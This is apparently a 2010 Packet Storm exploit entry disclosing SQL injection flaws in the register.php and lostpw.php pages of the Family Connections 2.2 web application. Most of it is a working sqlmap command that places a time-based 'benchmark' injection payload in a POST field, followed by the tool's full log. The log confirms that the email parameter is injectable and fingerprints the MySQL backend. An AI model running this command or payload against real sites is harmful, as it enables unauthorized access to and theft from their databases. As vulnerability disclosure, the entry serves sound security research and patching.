Family Connections 2.2 SQL Injection

2010-03-16T00:00:00
ID PACKETSTORM:87313
Type packetstorm
Reporter Blake
Modified 2010-03-16T00:00:00

Description

                                        
                                            `  
  
# Exploit Title: Family Connections version 2.2 SQL Injection  
# Date: March 15, 2010  
# Author: Blake  
# Software Link: http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.2/FCMS_2.2.zip/download  
# Version: version 2.2  
# Tested on: Windows XP SP3  
  
Multiple SQL Injection vulnerabilities are possible in the register.php and lostpw.php. Example with sqlmap against register.php:  
  
sqlmap -u "http://192.168.1.149/fcms/register.php" --method "POST" --data "username=%27+and+benchmark%2810000000%2CMD5%281%29%29%23&lname=on&fname=on&password=on&email=on&submit=Submit"  
  
sqlmap/0.6.4 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com<mailto:bernardo.damele@gmail.com>>  
and Daniele Bellucci <daniele.bellucci@gmail.com<mailto:daniele.bellucci@gmail.com>>  
  
[*] starting at: 16:39:13  
  
[16:39:13] [INFO] testing connection to the target url  
[16:39:41] [INFO] testing if the url is stable, wait a few seconds  
[16:40:37] [INFO] url is stable  
[16:40:37] [INFO] testing if POST parameter 'username' is dynamic  
[16:40:38] [WARNING] POST parameter 'username' is not dynamic  
[16:40:38] [INFO] testing if POST parameter 'submit' is dynamic  
[16:41:05] [WARNING] POST parameter 'submit' is not dynamic  
[16:41:05] [INFO] testing if POST parameter 'lname' is dynamic  
[16:41:33] [WARNING] POST parameter 'lname' is not dynamic  
[16:41:33] [INFO] testing if POST parameter 'fname' is dynamic  
[16:42:00] [WARNING] POST parameter 'fname' is not dynamic  
[16:42:00] [INFO] testing if POST parameter 'password' is dynamic  
[16:42:27] [WARNING] POST parameter 'password' is not dynamic  
[16:42:27] [INFO] testing if POST parameter 'email' is dynamic  
[16:42:57] [INFO] confirming that POST parameter 'email' is dynamic  
[16:43:57] [WARNING] unable to connect to the target url or proxy, sqlmap is going to retry the request  
[16:44:28] [INFO] POST parameter 'email' is dynamic  
[16:44:28] [INFO] testing sql injection on POST parameter 'email' with 0 parenthesis  
[16:44:28] [INFO] testing unescaped numeric injection on POST parameter 'email'  
[16:44:57] [INFO] POST parameter 'email' is not unescaped numeric injectable  
[16:44:57] [INFO] testing single quoted string injection on POST parameter 'email'  
[16:45:54] [INFO] confirming single quoted string injection on POST parameter 'email'  
[16:46:23] [INFO] POST parameter 'email' is single quoted string injectable with 0 parenthesis  
[16:46:23] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic  
[16:46:50] [WARNING] User-Agent parameter 'User-Agent' is not dynamic  
[16:46:50] [INFO] testing for parenthesis on injectable parameter  
[16:48:18] [INFO] the injectable parameter requires 0 parenthesis  
[16:48:18] [INFO] testing MySQL  
[16:48:46] [INFO] confirming MySQL  
[16:49:13] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1  
[16:49:13] [INFO] retrieved: 5  
[16:55:25] [INFO] performed 13 queries in 371 seconds  
[16:55:25] [INFO] the back-end DBMS is MySQL  
web server operating system: Windows  
web application technology: PHP 5.3.1, Apache 2.2.14  
back-end DBMS: MySQL >= 5.0.0  
  
  
[*] shutting down at: 16:55:25  
  
  
  
  
`